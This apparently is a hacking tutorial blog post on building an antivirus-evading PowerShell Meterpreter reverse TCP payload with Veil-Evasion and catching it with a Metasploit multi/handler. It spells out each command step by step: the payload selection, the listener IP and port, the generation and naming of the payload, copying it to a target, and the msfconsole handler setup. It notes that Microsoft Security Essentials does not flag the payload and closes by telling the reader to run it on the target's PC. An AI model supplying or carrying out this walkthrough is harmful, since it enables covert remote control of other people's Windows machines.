powershell_rev_tcp

As we said in the previous tutorial (c/meterpreter). Veil-Evasion is a tool, that knows to create a PAYLOADS for Metasploit tool.
We found that this tool, can cause collision between him and between MSF tool, and we also found some issues with Kali system and Wine installation.
So, we installed the Veil tool on Ubuntu 16.04 machine that exist in our LAN, and during the PAYLOAD creation process on Veil, we entered the values of our Laptop, that runs Kali Linux with MSF on it.
BTW, if you pen-testing from your office, you can create a PAYLOADS on any machine that you want, and in the values of the PAYLOADS, you can route the PAYLOADS to any machine that you want.
you don’t have to do it on one machine all the time.
As a Hackers, we can use a few Linux machines at the same time, (Virtual & Physical as well).

We found that the Microsoft Security Essential, does not alert about the Veil’s PAYLOADS, but, we haven’t tried it with other AVs.

 

[LETS MAKE IT WORK]

#1) Open terminal and navigate to Veil tool
assault@ubuntuvm:~$ cd Tools/Veil-evasion
assault@ubuntuvm:~/Tools/Veil-evasion$ ls
*Now, let’s locate the .py file & type*
assault@ubuntuvm:~/Tools/Veil-evasion$ sudo ./Veil-Evasion.py

 

*And we will get this output – the command*

veil-1

*Veil tool*

veil-2

 

Let’s continue….

#2) Inside Veil let’s type 1 by 1
[menu>>]: use powershell/meterpreter/rev_tcp

*We will get this output*

veilp-1

 

*Let’s set up the parameters of our Kali machine*

[powershell/meterpreter/rev_tcp>>]: set LHOST 192.168.50.15
[i] LHOST => 192.168.50.15
[powershell/meterpreter/rev_tcp>>]: set LPORT 4444
[i] LPORT => 4444

*Like this*

veilp-2

*Type*

[powershell/meterpreter/rev_tcp>>]: generate

*And we will get this output*

rev_http4
*Let’s pick a name to our new PAYLOAD*
*The name is will be: hack_by_the_powershell_process (for example)*

[>] Please enter the base name for output files (default is ‘payload’): hack_by_the_powershell_process

*We will get this output*

veilp-3

*Ok, let’s analyze the output*

  • Language – at which language is it written
  • Payload – the type of our payload (in our case is: reverse_tcp)
  • Required Options – the parameters of our payload
  • Payload file – the path of the bat format
  • Handler file – the path of the handler (for MSF tool)

It means that we can run the command: msfconsole -r hack_by_the_powershell_process1_handler.rc  from this path:
assault@hackbook:~/usr/share/veil-output/handlers$
*And MSF will run the payload immediately*
*In our case we are using 2 separate machines for this hack, so we will ignore this command (just for now)*
*Now, let’s copy the PAYLOAD to our target*

veilp-4

 

#3) Let’s move to Kali machine and open Metasploit by the command
assault@hackbook:~$ sudo msfconsole

*Inside MSF, type 1 by 1*

msf > use exploit multi/handler
msf exploit (handler) > set LHOST 192.168.50.15
LHOST => 192.168.50.15
msf exploit (handler) > set LPORT 4444
LPORT => 4444
msf exploit (handler) > set RHOST 192.168.50.7
RHOST => 192.168.50.7
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

*Like this*

veil-7

msf exploit (handler) > show options
*If everything looks OK at the options area, type exploit

msf exploit (handler) > exploit

*Now, what we left to do is, to run the payload on the target’s PC*

 

ENJOY! 🙂

 

Here is an example by Gamer Forever